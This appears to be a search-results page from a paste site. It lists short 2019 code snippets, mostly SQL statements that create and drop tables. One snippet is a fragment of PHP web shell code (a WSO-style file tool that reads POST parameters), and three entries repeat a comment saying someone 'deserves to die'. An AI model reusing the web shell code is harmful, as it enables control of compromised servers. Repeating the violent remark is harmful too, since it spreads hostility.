42.7K results in 818 ms
6 years ago · Oct 29, 2019, 10:58 PM
database SafeDatabase = db_open("safe_db.db"); db_query(SafeDatabase, "CREATE TABLE IF NOT EXISTS safes (ID INTEGER, PosX
6 years ago · Oct 29, 2019, 10:02 PM
BEGIN TRANSACTION; CREATE TABLE IF NOT EXISTS "biz" ( "id" INTEGER NOT NULL
6 years ago · Oct 29, 2019, 09:50 PM
user sources -- queries MySQL.createCommand("vRP/base_tables",[[ CREATE TABLE IF NOT EXISTS vrp_users( id INTEGER AUTO_INCREMENT,
6 years ago · Oct 29, 2019, 09:24 PM
Server up to 5.5.19 Create Table MDL_key::mdl_key_init memory corruption | [6795]
6 years ago · Oct 29, 2019, 08:40 PM
GO --удаление таблицы GO IF OBJECT_ID (N'Bibliotheque') IS NOT NULL DROP TABLE Bibliotheque; GO USE Library;
6 years ago · Oct 29, 2019, 06:24 PM
dbo.PlayerInfo GO DROP TABLE IF EXISTS dbo.ID_UNIQ_SEQ GO CREATE TABLE dbo.ID_UNIQ_SEQ (ID UNIQUEIDENTIFIER ROWGUIDCOL NOT NULL DEFAULT NEWID()) GO
6 years ago · Oct 29, 2019, 04:26 PM
WHERE A.receive_goods_id = pReceiveGoodsId AND NOT EXISTS (SELECT 1 FROM in_product_balance
6 years ago · Oct 29, 2019, 03:48 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
6 years ago · Oct 29, 2019, 01:02 PM
GO USE Sales GO IF NOT EXISTS (SELECT name FROM sys.filegroups
6 years ago · Oct 29, 2019, 12:06 PM
People just comment ? as if it's funny. It's not. ? deserves to die. He
6 years ago · Oct 29, 2019, 12:00 PM
People just comment ? as if it's funny. It's not. ? deserves to die. He
6 years ago · Oct 29, 2019, 11:50 AM
table `korisnici` -- DROP TABLE IF EXISTS `korisnici`; CREATE TABLE `korisnici` ( `id` int(11) NOT NULL, `ime` varchar(30) NOT
6 years ago · Oct 29, 2019, 11:04 AM
static void createNewDb(boolean createDatabase) { if (createDatabase) { executeSQLStatement("create database " + OBJECTHUB.getSetup().getNameOfDB(), true); } String recreationScript = "CREATE TABLE Jobs (\n" + " number int,\n"
6 years ago · Oct 29, 2019, 09:46 AM
drop database if exists Hospital; create database Hospital; use Hospital; create table doctors( id int auto_increment
6 years ago · Oct 29, 2019, 08:30 AM
People just comment ? as if it's funny. It's not. ? deserves to die. He
6 years ago · Oct 29, 2019, 07:36 AM
CREATE TABLE IF NOT EXISTS UserInfo ( UserID SERIAL PRIMARY
6 years ago · Oct 29, 2019, 07:30 AM
if exists calendar_item; drop table if exists game_ground; create table game_ground( ground_id serial
6 years ago · Oct 29, 2019, 07:19 AM
Create a table. $db->query( 'CREATE TABLE IF NOT EXISTS "users" ( "id" INTEGER PRIMARY
Total pages: 2134